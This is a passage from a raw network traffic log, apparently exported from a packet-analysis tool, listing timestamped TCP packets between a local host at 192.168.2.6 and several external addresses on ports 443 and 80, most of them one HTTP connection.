                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.890265942 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.890671015 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.890686989 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.891102076 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.893095016 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.893192053 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.894488096 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.894833088 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.894893885 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.894944906 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.894953966 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.895000935 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.895087004 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.895096064 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.895446062 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.896032095 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.896097898 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.897878885 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.897897005 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.897927999 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.897933960 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.901156902 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.901168108 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.901227951 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.901395082 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.901405096 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.927681923 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.927681923 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.927848101 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.927862883 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938225985 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938282013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938292027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938303947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938321114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938333035 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938344955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938400030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938402891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938402891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938402891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938411951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938424110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938432932 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938450098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938462019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938466072 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938473940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938486099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938492060 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938523054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938529015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938529015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938535929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938555002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938565969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938574076 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938577890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938587904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938600063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938611984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938699961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938699961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938699961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938731909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938744068 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938755035 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938786030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938793898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938813925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938827038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938838005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938844919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938879967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938879967 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938879967 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938879967 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938891888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938904047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939022064 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939033031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939043999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939055920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939062119 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939062119 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939062119 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939062119 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939074993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939088106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939091921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939119101 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939131021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939155102 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939166069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939167976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939167976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939167976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939181089 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939208984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939222097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939233065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939256907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939268112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939279079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939284086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939284086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939284086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939284086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939291954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939304113 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939310074 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939326048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939331055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939363956 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939371109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939383030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939393997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939412117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939412117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939433098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939445019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939455986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939467907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939481974 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939481974 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939527988 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939527988 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939532042 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939543962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939557076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939575911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939585924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939596891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939606905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939620972 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939631939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939666033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939666033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939666033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939666033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939703941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939714909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939726114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939735889 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939748049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939769030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939769030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939796925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939809084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939815044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939862013 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939934015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939974070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939984083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.939996958 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940004110 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940016985 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940026999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940041065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940051079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940062046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940067053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940067053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940067053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940079927 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940098047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940110922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940123081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940150976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940150976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940150976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940152884 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940165043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940171003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940191984 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940218925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940248013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940272093 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940284014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940294027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940310955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940321922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940355062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940355062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940373898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940386057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940397978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940429926 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940439939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940440893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940442085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940442085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940453053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940464020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940469980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940562963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940573931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940584898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940591097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940591097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940591097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940599918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940613031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940619946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940632105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940650940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940679073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940691948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940701008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940712929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940717936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940717936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940717936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940717936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940754890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940767050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940778971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940788984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940798044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940798044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940798044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940800905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940841913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940841913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940844059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940856934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940869093 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940879107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940881968 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940881968 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940926075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.940926075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.946516991 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.946523905 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.946537018 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.946603060 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.946626902 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.947025061 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.947067022 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.947355986 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.947417974 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.947458029 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.950838089 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.950887918 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.950903893 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.951294899 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.951340914 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.967199087 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.967317104 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.967334986 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.967442989 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.967570066 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.970367908 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.970375061 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.970926046 CET50004443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.970949888 CET4435000413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.971009970 CET50004443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.973310947 CET50004443192.168.2.613.107.246.40
